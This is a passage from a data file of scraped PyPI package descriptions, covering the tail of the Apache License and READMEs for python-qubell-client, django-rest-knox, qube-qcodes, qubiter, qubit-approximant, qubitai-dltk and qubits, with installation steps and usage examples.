\"NOTICE\" text file as part of its distribution, then anyDerivative Works that You distribute must include a readable copy of theattribution notices contained within such NOTICE file, excluding those noticesthat do not pertain to any part of the Derivative Works, in at least one of thefollowing places: within a NOTICE text file distributed as part of theDerivative Works; within the Source form or documentation, if provided alongwith the Derivative Works; or, within a display generated by the DerivativeWorks, if and wherever such third-party notices normally appear. The contents ofthe NOTICE file are for informational purposes only and do not modify theLicense. You may add Your own attribution notices within Derivative Works thatYou distribute, alongside or as an addendum to the NOTICE text from the Work,provided that such additional attribution notices cannot be construed asmodifying the License.You may add Your own copyright statement to Your modifications and may provideadditional or different license terms and conditions for use, reproduction, ordistribution of Your modifications, or for any such Derivative Works as a whole,provided Your use, reproduction, and distribution of the Work otherwise complieswith the conditions stated in this License.5. Submission of Contributions.Unless You explicitly state otherwise, any Contribution intentionally submittedfor inclusion in the Work by You to the Licensor shall be under the terms andconditions of this License, without any additional terms or conditions.Notwithstanding the above, nothing herein shall supersede or modify the terms ofany separate license agreement you may have executed with Licensor regardingsuch Contributions.6. Trademarks.This License does not grant permission to use the trade names, trademarks,service marks, or product names of the Licensor, except as required forreasonable and customary use in describing the origin of the Work andreproducing the content of the NOTICE file.7. Disclaimer of Warranty.Unless required by applicable law or agreed to in writing, Licensor provides theWork (and each Contributor provides its Contributions) on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,including, without limitation, any warranties or conditions of TITLE,NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You aresolely responsible for determining the appropriateness of using orredistributing the Work and assume any risks associated with Your exercise ofpermissions under this License.8. Limitation of Liability.In no event and under no legal theory, whether in tort (including negligence),contract, or otherwise, unless required by applicable law (such as deliberateand grossly negligent acts) or agreed to in writing, shall any Contributor beliable to You for damages, including any direct, indirect, special, incidental,or consequential damages of any character arising as a result of this License orout of the use or inability to use the Work (including but not limited todamages for loss of goodwill, work stoppage, computer failure or malfunction, orany and all other commercial damages or losses), even if such Contributor hasbeen advised of the possibility of such damages.9. Accepting Warranty or Additional Liability.While redistributing the Work or Derivative Works thereof, You may choose tooffer, and charge a fee for, acceptance of support, warranty, indemnity, orother liability obligations and/or rights consistent with this License. However,in accepting such obligations, You may act only on Your own behalf and on Yoursole responsibility, not on behalf of any other Contributor, and only if Youagree to indemnify, defend, and hold each Contributor harmless for any liabilityincurred by, or claims asserted against, such Contributor by reason of youraccepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your workTo apply the Apache License to your work, attach the following boilerplatenotice, with the fields enclosed by brackets \"[]\" replaced with your ownidentifying information. (Don't include the brackets!) The text should beenclosed in the appropriate comment syntax for the file format. We alsorecommend that a file or class name and description of purpose be included onthe same \"printed page\" as the copyright notice for easier identification withinthird-party archives.Copyright [yyyy] [name of copyright owner]Licensed under the Apache License, Version 2.0 (the \"License\");you may not use this file except in compliance with the License.You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.Description: python-qubell-client====================Installation============pip install qubell-api-python-clientConfiguration=============To configure tests, set up environment variables:QUBELL_USER, QUBELL_PASSWORD - user to access qubellQUBELL_TENANT - url to qubell platform (https://express.qubell.com)QUBELL_ORGANIZATION - name of organization to use. Will be created if not exists.If you attend to create environment, you will also need:PROVIDER_TYPE, PROVIDER_REGION, PROVIDER_IDENTITY, PROVIDER_CREDENTIAL - credentials for amazon ec2. (to create provider)By default Amazon ec2 used (in us-east zone)Example:export QUBELL_TENANT=\"https://express.qubell.com\"export QUBELL_USER=\"user@gmail.com\"export QUBELL_PASSWORD=\"password\"export QUBELL_ORGANIZATION=\"my-org\"# Additional parametersexport PROVIDER_TYPE=\"aws-ec2\"export PROVIDER_REGION=\"us-east-1\"export PROVIDER_IDENTITY=\"FFFFFFFFF\"export PROVIDER_CREDENTIAL=\"FFFFFFFFFF\"CLI Tool========Many operations are available direcly through CLI interface, like creating orgs,initializing cloud accounts, and importing/exporting applications.$ nomiUsage: nomi [OPTIONS] COMMAND [ARGS]...CLI for tonomi.com using contrib-python-qubell-clientTo enable completion:eval \"$(_NOMI_COMPLETE=source nomi)\"Options:--tenant TEXT Tenant url to use, QUBELL_TENANT by default--user TEXT User to use, QUBELL_USER by default--password TEXT Password to use, QUBELL_PASSWORD by default--organization TEXT Organization to use, QUBELL_ORGANIZATION by default--debug Debug mode, also QUBELL_LOG_LEVEL can be used.--help Show this message and exit.Commands:instanceapplicationenvironmentorganizationplatformzonemanifestCommands are documented via help:$ nomi instance --helpUsage: nomi instance [OPTIONS] COMMAND [ARGS]......Features:instancedescribe Show details about instancedestroy Destroy instancelaunch Launch instance in applicationlist List instances in current organization or applicationlogs Get activity logsparameters Get default launch parameters for applicationremove Force remove instancewait-status Wait until instance status becomes 'Status' or timeout reachedapplicationdelete Delete applicationexport Save manifest of applications to filesimport Upload manifest to application.list List applications in organizationenvironmentclear Clean environment.clone Copy environmentcreate Create environmentdelete Delete environmentdescribe Show services, markers and properties of environmentexport Save environment to fileget-keypair Download keypairimport Import environment from fileinit Add basic services to environment (WF, CA, KS services)list List environmentsmake-defaultorganizationcreate Create organizationimport-kit Import starter kitinit Initialize cloud account servicelist List organizationsrestore Restore configuration from ENV fileplatformshow-account Exports current account configuration inshell-friendly form. Takes intoaccount explicit top-level flags like --organizationzonelist List available zonesmanifestvalidate Validate manifestRunning tests=============Run single test:nosetests -s -v stories.instance.test_actions:BasicInstanceActionsTest.test_workflow_launchRun all tests in folder:nosetests -s -v testsorcd testsnosetestsUsing client============Building sandboxes------------------Sandboxes in qubell platform could be created on different levels. Maximum isolated sandbox could be achieved by separate organization (with it's own environments, users and application).Simple way to create sandbox (see ./contrib-python-qubell-client/sandbox/):Create file containing organization structure, for example:organizations:- name: DEFAULT_ORGapplications:- name: super_parentfile: ./super_parent.yml- name: middle_childfile: ./middle_child.yml- name: childfile: ./child.ymlenvironments:- name: defaultservices:- name: Default credentials service- name: Default workflow service- name: child-serviceservices:- name: Default workflow servicetype: builtin:workflow_service- name: Default credentials servicetype: builtin:cobalt_secure_store- name: child-serviceapplication: childinstances:- name: test-instanceapplication: super_parentNow you can create organization, running:./restore_env.py default.envAfter, you will have fully configured organization, even with running instances. This example shows how to describe 3-level hearchical application, where child instance launched as service.Coding your own scripts-----------------------First way of creating sandbox, using restore method:config = {'organizations': [{'name': 'DEFAULT_ORG','applications': [{'file': './super_parent.yml','name': 'super_parent'},{'file': './middle_child.yml','name': 'middle_child'},{'file': './child.yml','name': 'child'}],'environments': [{'name': 'default','services': [{'name': 'Default credentials service'},{'name': 'Default workflow service'},{'name': 'child-service'}]}],'instances': [{'application': 'super_parent','name': 'test-instance'}],'providers': [{'ec2SecurityGroup': 'default','jcloudsCredential': 'AAAAAAAAA','jcloudsIdentity': 'BBBBBBBBBBB','jcloudsRegions': 'us-east-1','name': 'generated-provider-for-tests','provider': 'aws-ec2','providerCopy': 'aws-ec2'}],'services': [{'name': 'Default workflow service','type': 'builtin:workflow_service'},{'name': 'Default credentials service','type': 'builtin:cobalt_secure_store'},{'application': 'child','name': 'child-service'}]}]}from qubell.api.private.platform import QubellPlatformfrom qubell.api.globals import QUBELLplatform = QubellPlatform.connect(user=QUBELL['user'], password=QUBELL['password'], tenant=QUBELL['tenant'])platform.restore(config)# Let's check what we've gotprint platform.organizations['DEFAULT_ORG'].namefor ins in platform.organizations['DEFAULT_ORG'].instances:print ins.nameSecond way, using get/create methods:from qubell.api.private.platform import QubellPlatformfrom qubell.api.private.manifest import Manifestfrom qubell.api.globals import QUBELL, PROVIDER_CONFIG, DEFAULT_WORKFLOW_SERVICE, DEFAULT_CREDENTIAL_SERVICE, DEFAULT_CLOUD_ACCOUNT_SERVICEfrom qubell.api.private.service import CLOUD_ACCOUNT_TYPE, WORKFLOW_SERVICE_TYPE, COBALT_SECURE_STORE_TYPE# Connect to platformplatform = QubellPlatform.connect(user=QUBELL['user'], password=QUBELL['password'], tenant=QUBELL['tenant'])##### Organizationorg = platform.organization(name='DEFAULT_ORG')# After executing this code, organization \"DEFAULT_ORG\" would be created (if not exists) or initialized (if exists)##### Environment# Usually environment consists of cloud account, keystore service and workflow service. So, we need to add these services to our organization, then add them to our environment:def prepare_env(org):# Add services to organizationkey_service = org.service(type=COBALT_SECURE_STORE_TYPE, name=DEFAULT_CREDENTIAL_SERVICE())wf_service = org.service(type=WORKFLOW_SERVICE_TYPE, name=DEFAULT_WORKFLOW_SERVICE())cloud_account = org.service(type=CLOUD_ACCOUNT_TYPE, name=DEFAULT_CLOUD_ACCOUNT_SERVICE(), parameters=PROVIDER_CONFIG)# Add services to environmentenv = org.environment(name='new-environment')env.clean()env.add_service(key_service)env.add_service(wf_service)env.add_service(cloud_account)# Here we regenerate keypairenv.add_policy({\"action\": \"provisionVms\",\"parameter\": \"publicKeyId\",\"value\": key_service.regenerate()['id']})return envenvironment = prepare_env(org)# Now, platform ready to be used. We need only application with valid manifest.##### Application# We need manifest to create application::manifest = Manifest(url='https://raw.githubusercontent.com/qubell/contrib-python-qubell-client/master/sandbox/child.yml')# Creating applicationapp = org.application(manifest=manifest, name='first_app')# Application will be created.# Let's start instance using in env1 :instance = org.create_instance(application=app, environment=environment)# This way we wait instance to came up in 15 minutes or break.assert instance.ready(15)print instance.return_values['child_out.child_output']Platform: UNKNOWN"} +{"package": "qube-money-knox", "pacakge-description": "django-rest-knoxAuthentication Module for django rest authKnox provides easy to use authentication forDjango REST\nFrameworkThe aim is to allow\nfor common patterns in applications that are REST based, with little\nextra effort; and to ensure that connections remain secure.Knox authentication is token based, similar to theTokenAuthenticationbuilt in to DRF. However, it overcomes some problems present in the\ndefault implementation:DRF tokens are limited to one per user. This does not facilitate\nsecurely signing in from multiple devices, as the token is shared.\nIt also requiresalldevices to be logged out if a server-side\nlogout is required (i.e. the token is deleted).Knox provides one token per call to the login view - allowing each\nclient to have its own token which is deleted on the server side\nwhen the client logs out.Knox also provides an option for a logged in client to removealltokens that the server has - forcing all clients to re-authenticate.DRF tokens are stored unencrypted in the database. This would allow\nan attacker unrestricted access to an account with a token if the\ndatabase were compromised.Knox tokens are only stored in a secure hash form (like a password). Even if the\ndatabase were somehow stolen, an attacker would not be able to log\nin with the stolen credentials.DRF tokens track their creation time, but have no inbuilt mechanism\nfor tokens expiring. Knox tokens can have an expiry configured in\nthe app settings (default is 10 hours.)More information can be found in theDocumentationRun the tests locallyIf you need to debug a test locally and if you havedockerinstalled:simply run the./docker-run-tests.shscript and it will run the test suite in every Python /\nDjango versions.You could also simply run regulartoxin the root folder as well, but that would make testing the matrix of\nPython / Django versions a bit more tricky.Work on the documentationOur documentation is generated byMkdocs.You can refer to their documentation on how to install it locally.Another option is to usemkdocs.shin this repository.\nIt will run mkdocs in adockercontainer.Running the script without any params triggers theservecommand.\nThe server is exposed on localhost on port 8000.To configure the port theservecommand will be exposing the server to, you\ncan use the following env var:MKDOCS_DEV_PORT=\"8080\"You can also pass anymkdocscommand like this:./mkdocs build\n./mkdocs --helpCheck theMkdocs documentationfor more."} +{"package": "qube-qcodes", "pacakge-description": "qubeUseful tools for experiments performed by the group of Dr. Christopher Bauerle (CNRS Neel Institute, Grenoble).\nExamples can be found in the \"examples\" folder.How to install QCoDeS?Open your Anaconda/Miniconda prompt and install qcodes:condacreate-nqcodespython=3.9\ncondaactivateqcodes\npipinstallqcodesOpen your Anaconda/Miniconda prompt and install additional packages:activateqcodes\npipinstallpython-gdsii\npipinstallstyle\ncondainstall-cconda-forgescipy\ncondainstall-cconda-forgegdspy\ncondainstall-cconda-forgejupyterlab\ncondainstall-cconda-forgeipympl\ncondainstall-cconda-forgenidaqmx-python\npipinstallnifpgaHow to install qube?Easy installation:activateqcodes\npipinstallqube-qcodesDynamical installationDownload qube package from GitHubOpen your Anaconda/Miniconda prompt:pip install -e PACKAGE_FOLDER\\qube-qcodesIf you change anything in the qube project folder, it will be applied toimport qubeHow to start an experiment with QCoDeS?COPY the \"YYYYMMDD__experiment__sample\" folder into \"E:/your_name/\" and rename it the following way:YYYYMMDD ... starting date of the experiment\nexperiment ... name of your experiment -- for instance \"ABL\" for Aharanov-Bohm oscillations with Levitons\nsample ... name of your sample -- for instance \"v0_b3\" for first version of design and 2nd column (B) and 3rd row (3) of your chipNote: For automatic recognition, is important to keep TWO subsequent underscores \"__\" between the keywords of the folder name.The folder has the following content:./configurations/\nThis folder holds Jupyter Notebooks to setup different configurations of your experiment.\nAs a starting point you can check the default configuration of your fridge -- for instance \"default_wodan.ipynb\".\nSetup your configurations accordingly with reasonable file names -- such as \"c0_lock_in.ipynb\", \"m1_pinch_off_dc.ipynb\", ... .\nA configuration notebook contains the instruments that are used on your experimental setup.\nIf you make a modification, always modify a copy of a previously used configuration../measurements/\nThis folder will contain the database for your experiment \"experiments.db\" with all the measurements.\nAdditionally, there should be all the code for the measurements that are executed during your experiment.\nThe measurement template \"tutorial.ipynb\" contains all the imports to perform sweeps and basic plotting operations.\nUse it for your measurements that should be always saved with reasonable names such as \"m0_lockin_test\", \"m1_pinch_off_at_4K\", ... ../notes/\nHere one should find only notes that are prepared in a presentable way.\nWe propose to use jupyter notebook with markdown language since it is flexible.\nYou can make your notes however in any format you like (OneNote, PowerPoint, ...)./tools/\nThis folder contains tools and instrument drivers that go beyond the standard qcodes functionality.\nFeel free to adapt them for your application and to add custom functions that you can use in your measurements.\nAfter implemententing a new feature that is working well, one can discuss an update of the driver in the template folder../QCoDeS - Jupyter Notebook\nWindows shortcut to open qcodes via Miniconda3 locally or on a network drive.SETUP your configuration file:MEASURE:ANALYSE:"} +{"package": "qubic", "pacakge-description": "Simulation and map-making tools for the QUBIC experiment."} +{"package": "qubic.sphinx.graphvizinclude", "pacakge-description": "Contentsqubic.sphinx.graphvizincludeOverviewInstallationRegistering the ExtensionUsing the Extensionchange historyqubic.sphinx.graphvizincludeOverviewThis package defines an extension for theSphinxdocumentation system. The extension\nallows generation of Graphviz from external .dot resourcesInstallationInstall viaeasy_install:$ bin/easy_install qubic.sphinx.graphvizincludeor any other means which gets the package on yourPYTHONPATH.Registering the ExtensionAddqubic.sphinx.graphvizincludeto theextensionslist in theconf.pyof the Sphinx documentation for your product. E.g.:extensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'qubic.sphinx.graphvizinclude',\n ]Using the ExtensionAt appropriate points in your document, call out the interface\nautodocs via:.. graphvizinclude:: ./path_to/graph_definition.dotchange history0.1first release"} +{"package": "qubit", "pacakge-description": "No description available on PyPI."} +{"package": "qubitai-dltk", "pacakge-description": "AboutOur philosophy is to create a Deep Technologies platform with ethical AI for enterprises that offers meaningful insights and actions.DLTK Unified Deep Learning platform can be leveraged to build solutions that are Application-Specific and Industry-Specific where AI opportunity found by using DLTK SDKs, APIs and Microservices. With best of the breed AI Services from platform pioneers like H2O, Google's TensorFlow, WEKA and a few trusted open-sources models and libraries, we offer custom AI algorithms with co-innovation support.Getting StartedPre-requisiteOpenDLTK: OpenDLTK is collection of open-source docker images, where processing of images, text or structured tabular data is done using state-of-the-art AI models.Please follow the below link for instructions onOpenDLTK InstallationInstallationInstalling through pippipinstallqubitai-dltkInstalling from SourceClone the repogitclonehttps://github.com/dltk-ai/qubitai-dltk.gitSet working directory to qubitai-dltk foldercdqubitai-dltkInstall requirements from requirements.txt filepipinstall-rrequirements.txtUsageA detailed documentation is presenthere, on how to use various services supported by DLTK,\nto verify whether all setup are done properly, we will be using a sample NLP code to analyze sentiment of the input text.Exampleimportdltk_aiclient=dltk_ai.DltkAiClient(base_url='http://localhost:8000')text=\"The product is very easy to use and has got a really good life expectancy.\"sentiment_analysis_response=client.sentiment_analysis(text)print(sentiment_analysis_response)Important Parameters:APIkey: a valid API key generated by following steps as shownherebase_url: The base_url is the url for the machine where base service is installed. (default:http://localhost:8000)Expected Output{\"nltk_vader\":{\"emotion\":\"POSITIVE\",\"scores\":{\"negative\":0.0,\"neutral\":0.653,\"positive\":0.347,\"compound\":0.7496}}}ServicesMachine LearningML Scikit- This Microservice uses widely used Scikit package for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.ML H2O- This Microservice uses H2O.ai python SDK for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.ML Weka- This Microservice uses WEKA for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.Example NotebooksML Classification Colab NotebookML Regrression Colab NotebookML Clustering Colab NotebookNatural Language Processing (NLP)This microservice provides features like Sentiment analysis, Name Entity Recognition, Tag Extraction using widely usedSpacyandNLTKpackage. It also provide support\nfor various AI engines like Azure & IBM.Example NotebookNLP Colab NotebookComputer VisionImage Classification- This microservice classify images into various classes using pretrained model and also using supported AI Engines.Object Detection- This microservice detect objects in Images provided by user using pretrained model and using supported AI Engines.Example NotebooksImage Classification Colab NotebookObject Detection Colab NotebookFace Analytics Colab NotebookNoteTo use third party AI engines like Microsoft Azure & IBM watson, please ensure that its credentials were configured while setting up openDLTK.DocumentationFor more detail on DLTK features & usage please referDLTK SDK Client DocumentationLicenseThe content of this project itself is licensed underGNU LGPL, Version 3 (LGPL-3)TeamFounding MemberMentorLead MaintainerCore ContributorFor more details you can reach us at QubitAI Email-ID -connect@qubitai.tech"} +{"package": "qubit-approximant", "pacakge-description": "QubitApproximantApythonpackage for approximating quantum circuits with a single qubit.Documentation and examplesDocumentation created withmkdocscan be found inhttps://pablovegan.github.io/QubitApproximant/.InstallationWithpip:pip install qubit-approximantQuick usageImporting a functionIn the submodule benchmarking.functions there are multiple test functions to choose fromimportnumpyasnpfromqubit_approximant.benchmarking.functionsimportgaussianx=np.linspace(-2.5,2.5,1000)fn_kwargs={'mean':0.0,'std':0.5,'coef':1}fn=gaussian(x,**fn_kwargs)Creating a circuitTo create a circuit just choose the ansaz (CircuitRxRyRz,CircuitRxRyorCircuitRy) and the encoding ('prob'or'amp').fromqubit_approximant.coreimportCircuitRxRyRzcircuit=CircuitRxRyRz(x,encoding='prob')Cost functionTo find the optimum parameters of the circuit, we need to choose a cost function. This can be done with theCostclass, where we input the function to approximate, the circuit ansatz and a metric to quantify the error in the approximation (options are'mse','rmse','mse_weighted','kl_divergence'or'log_cosh')fromqubit_approximant.coreimportCostcost=Cost(fn,circuit,metric='mse')OptimizerChoose an optimizer (BlackBoxOptimizer,GDOptimizerorAdamOptimizer)fromqubit_approximant.coreimportBlackBoxOptimizeroptimizer=BlackBoxOptimizer(method=\"L-BFGS-B\")and find the optimum parameters for the chosen circuitlayers=6init_params=np.random.default_rng().standard_normal(4*layers)opt_params=optimizer(cost,cost.grad,init_params)Multilayer optimizerWe may also optimize an ansatz for multiple layers using theLayerwiseOptimizer, which uses the optimum parameters for a circuit with $L$ layers as initial parameters for the optimization of a circuit with $L+1$ layers. A list with the optimum parameters for each layer is returned.fromqubit_approximant.coreimportLayerwiseOptimizerlayerwise_opt=LayerwiseOptimizer(optimizer,min_layer=3,max_layer=7,new_layer_coef=0.3,new_layer_position='random')params_list=layerwise_opt(cost,cost.grad,init_params)Note: aMultilayerOptimizerwhich doesn't reuse the optimized parameters from previous layers is also available.Error metricsTo benchmark the optimization we can use some common metrics, like the $L^1$ norm, $L^2$ norm, $L^\\infty$ norm or infidelity $1-F$, to compare the function encoded in the circuit with the desired function. Following our example,fnis agaussian:l1_list,l2_list,inf_list,infidelity_list=metric_results(params_list,circuit,fn=gaussian,fn_kwargs={'mean':0.0,'std':0.5,'coef':1})Wrapping upTest the library yourself!importnumpyasnpfromqubit_approximant.benchmarking.functionsimportgaussianfromqubit_approximant.coreimportCircuitRxRyRz,Cost,BlackBoxOptimizer,LayerwiseOptimizerfromqubit_approximant.benchmarkingimportmetric_resultsx=np.linspace(-2.5,2.5,1000)fn_kwargs={'mean':0.0,'std':0.5,'coef':1}fn=gaussian(x,**fn_kwargs)circuit=CircuitRxRyRz(x,encoding='prob')cost=Cost(fn,circuit,metric='mse')optimizer=BlackBoxOptimizer(method=\"L-BFGS-B\")min_layer=3init_params=np.random.default_rng().standard_normal(4*min_layer)layerwise_opt=LayerwiseOptimizer(optimizer,min_layer=min_layer,max_layer=7,new_layer_coef=0.3,new_layer_position='random')params_list=layerwise_opt(cost,cost.grad,init_params)l1_list,l2_list,inf_list,infidelity_list=metric_results(fn=gaussian,fn_kwargs={'mean':0.0,'std':0.5,'coef':1},circuit=circuit,params_list=params_list)Bonus: benchmarking multiple initial parametersThe initial paramenters for the optimizer are generated at random with aseedof our choice. We can benchmark the optimizer against multiple seeds (since it is a time consuming task it is parallelized usingmpi).benchmark_seeds(num_seeds=4,fn=gaussian,fn_kwargs=fn_kwargs,circuit=circuit,cost=cost,optimizer=multilayer_opt,filename=\"results\",)ReferencesThis library is based on Adrian P\u00e9rez Salinas articleData re-uploading for a universal quantum classifier.ContributingPull requests are welcome. For major changes, please open an issue first\nto discuss what you would like to change.Please make sure to update tests as appropriate.LicenseThis software is under theGNU General Public License v3.0."} +{"package": "qubitcoin", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qubitcoind", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qubiter", "pacakge-description": "Qubiter at GitHubTutorialThe following Jupyter notebook is a\ngood introduction to Qubiter's basic features. Other notebooks\nin Qubiter's jupyter notebook folder\ndiscuss more advanced features:https://github.com/artiste-qb-net/qubiter/blob/master/qubiter/jupyter_notebooks/Say_Hello_World_With_Qubiter.ipynbInstallationThe simplest thing that avoids\nmany of the installation hassles is to get an account\non our Amazon cloud servicewww.bayesforge.com. It's free for one year.\nBayesforge already has\nall of Python and Qubiter installed (although you may need to\nupdate Qubiter using Git).\nBayesforge is also available on the Tencent cloud.Of course, you can also clone the latest version or update\nan older version of Qubiter on your computer\nfrom this repo by using Git commands.Alternatively, you can install an older but more stable version\nof Qubiter from the Python package\nmanagerpipusing:pip install qubiter --userIf you are using a Jupyter notebook, use:!pip install qubiter --userand restart the kernel.What is Qubiter?The Qubiter project aims to provide eventually a full suite of tools, written mostly in Python, for designing and simulating quantum circuits on classical computers. (So it will address only the needs of gate model, not annealer, quantum computer engineers). We or others could start a similar project for annealers.An earlier C++ computer program also called Qubiter (seehttp://www.ar-tiste.com/qubiter.html), written by Robert R. Tucci, did only quantum compiling. This newer project includes a quantum CSD compiler similar to the earlier Qubiter, based on the (Cosine-Sine) CS Decompostion of Linear Algebra, but written in Python. But this new project also includes much more than that.We've included classes for reading and writing quantum circuit files. Also for expanding circuits with gates that have multiple controls into circuits with only CNOTs and single qubit rotation gates. Also for embedding a circuit inside a larger one. And, last but not least, we've included a simulator.The simulator hasn't been bench-marked but should be pretty fast, because it relies on Numpy, which is a Python wrapper for C code.Besides being amply documented with docstrings, each class has a main method at the end giving examples of its usage (and testing it). Plus we've included a large and ever increasing collection of Jupyter notebooks that teach some physics and how to use Qubiter at the same time.The quantum circuits are saved as text files, which allows easy exchange between QC engineers.The quantum circuits are draw in ASCII (not in postscript or in a proprietary format). We hope we can convince you that ASCII drawings of quantum circuits are surprisingly clear, expressive, and convenient, really all you need, plus, unlike other formats, they are super easy to edit. Using other formats might require you to master difficult subjects like postscript in order to write/edit circuit files. This is totally unnecessary!Quantum Fog at GitHub (seehttps://github.com/artiste-qb-net/quantum-fog) is a twin project started by the same people. We hope that eventually Quantum Fog will call Qubiter to perform some tasks, like quantum compiling and simulating.All of Qubiter at GitHub except for the contents of the quantum_CSD_compiler folder is licensed under the BSD license (3 clause version) with an added clause at the end, taken almost verbatim from the Apache 2.0 license, granting additional Patent rights. SeeLICENSE.md.The contents of Qubiter's quantum_CSD_compiler folder are licensed under the GPLv2 (Linux) license.Contributors(Alphabetical Order)Dekant, HenningTregillus, HenryTucci, RobertYin, Tao"} +{"package": "qubit-hash", "pacakge-description": "No description available on PyPI."} +{"package": "qubit-hashs", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qubitmapping", "pacakge-description": "No description available on PyPI."} +{"package": "qubit-opencensus", "pacakge-description": "OpenCensus Utils - A collection of tools for use with OpenCensus Python=======================================================================A colection of utilities for https://github.com/census-instrumentationPython------- trace- propagator- jaeger- asyncio_context- tracers- asyncio_context_tracer- ext- sanic- aiohttp- aioredisInstallation & basic usage--------------------------For python1. Install the qubit-opencensus package using `pip`_ or `pipenv`_:::pip install qubit-opencensus"} +{"package": "qubits", "pacakge-description": "Abstract:QUBITS is a python package and command-line tool used to simulate\nvarious flavours of astronomical transient surveys. The simulations are\ndesigned to be easy to use and tailor without having to hack any code,\nand many of the simulation parameters can be found in one settings file.Although recoded from scratch, thesecond chapter of my\nthesisdescribes most of the\ndetails used to build these transient survey simulations.Installation and Setting Up Your EnvironmentQUBITS relies heavily on`pysynphot`__\nwhich no longer supports a PyPI distribution. Therefore the easiest way\nto get QUBITS running is to installAnacondaand then use\ntheSTScI\u2019s AstroConda channel to install their Standard Software\nStack(which includes pysynphot). Once this stack is installed,\ncreate/activate a conda environment that includes the stack and run:pip install qubitsThis should install the QUBITS code and all of its dependencies. If this\ndoesn\u2019t work, or you want to tinker with the code by installing QUBITS\nas a development package, then clone the project using this command:git clone git@github.com:thespacedoctor/qubits.git and thencd and:python setup.py installorpython setup.py developPYSYN_CDBSThe STScI Calibration Reference Data SystemNote that the data files required bypysynphot, and hence QUBITS,\nare distributed separately bySTScI Calibration Reference Data\nSystem.\nBefore starting you will need to download of the calibration data from\nthe FTP area linked from theSTScI\nwebpage,\nunpack them somewhere appropriate and organise them into a single nested\nfolder structure like so:PYSYN_CDBSFinally, you need to make sure thePYSYN_CDBSenvironment variable\nis set sopysynphotknows where these data live. Add the following to\nyour.bashrcfile and don\u2019t forget to open a new terminal window\nbefore you begin to use QUBITS:bash exportPYSYN_CDBS=/path/to/cdbs/I haven\u2019t tested this on many other machines so let me know what goes\nwrong with the installation!UsageUsage:\n qubits init \n qubits run -s -o -d \n\n COMMANDS\n --------\n init setup a qubits settings file and a test spectral database\n\n ARGUMENTS\n ---------\n pathToSettingsFile path to the yaml settings file\n pathToWorkspace path to a directory within which to setup an example qubit workspace\n\n FLAGS\n -----\n -h, --help show this help message\n -s, --settings provide a path to the settings file\n -d, --database provide the path to the root directory containing your nested-folders and files spectral database\n -o, --output provide a path to an output directory for the results of the simulations*Quick StartIf you\u2019re using QUBITS for the first time, or have not used it in a\nwhile, the best way to start is to use thequbits initcommand to\ngenerate a template workspace for yourself. Running the command:bash qubits init ~/Desktop/qubits_workspacecreates a template workspace on your desktop with:a template spectral databasequbits_spectral_database,a default qubits settings filequbits_settings.yaml,an empty output directoryqubits_outputqubits template workspaceOnce you familiarise yourself with running QUBITS you can move this\nworkspace elsewhere and tailor the spectral database and settings file\nto your needs.Building a Spectral DatabaseWithin the folder you choose to place your spectral database, create\nappropriately named folders for each of the specific transient objects\nyou would like to include in the simulations. Note these are the names\nto be included in the settings file (see below) and that will appear in\nresults files, plots and logs. Your database might look like this:qubits_spectral_database/\n SNIa/\n t-021.00.spec\n t-012.00.spec\n t+003.00.spec\n t+015.00.spec\n t+024.00.spec\n t+068.00.spec\n t+098.00.spec\n t+134.00.spec\n SNIIp/\n ...\n SLSN/\n ...Name your spectral files with times relative to some epoch within the\ntransient\u2019s evolution (e.g. peak magnitude or explosion date). QUBITS\nwill determine the time of peak magnitude when generating the\nlightcurves from the spectra and recalibrate the time scale relative to\nthis point. The files should contain two space separated columns\ncontaining wavelength (\u00c5) and flux (ergs/s/cm^2/\u00c5). Have a look in the\ntemplate database supplied by thequbits initcommand.Settings FileA template simulation settings file is provided by thequbits initcommand and should look something like this:version: 1\n\n##### PROGRAM EXECUTION SETTINGS #####\nProgram Settings:\n # STAGE 1 - LIGHTCURVES\n Extract Lightcurves from Spectra: True\n # STAGE 2 - KCORRECTION DATABASE\n Generate KCorrection Database: True\n Generate KCorrection Plots: True # ONLY SET TO TRUE IF ONLY A FEW KCORRECTIONS ARE TO BE CALCULATED\n # STAGE 3 - RUNNING SIMULATION\n Run the Simulation: True\n Plot Simulation Helper Plots: True # ONLY PLOT IF DEBUGGING\n # STAGE 4 - COMPILING RESULTS\n Compile and Plot Results: True\n Simulation Results File Used for Plots: simulation_results_20130919t131758.yaml\n\n###### SIMULATED SURVEY CONSTRAINTS ######\nExtra Survey Constraints:\n Faint-Limit of Peak Magnitude: 21.50 # The lower-limit of the apparent peak magnitude so that the transient can be distinguished from other flavours of transients. Set this to 99.9 for this setting to be disregarded.\n Observable for at least ? number of days: 100 #\u00a0Set this to 1 for this setting to be distregarded\nLower Redshift Limit: 0.00 ## Usually set to 0.0\nUpper Redshift Limit: 1.0\nRedshift Resolution: 0.05 ## Higher resolution (lower number) means the simulations are more accuate but the code shall take long to run, especially for the k-correction database generation.\nSky Area of the Survey (square degrees): 70\nLimiting Magnitudes:\n g : 23.3\n r : 23.3\n i : 23.3\n z : 21.7\nSurvey Cadence:\n # YEAR MINUS FRACTION LOST DUE TO OBJECTS BEING LOCATED BEHIND THE SUN\n Observable Fraction of Year: 0.5\n Fraction of Year Lost to Weather etc: 0.4\n Filters:\n - band: g\n day of year of first scheduled observation: 1\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n - band: r\n day of year of first scheduled observation: 1\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n - band: i\n day of year of first scheduled observation: 2\n repeat every ? days: 3\n Fraction of Lunar 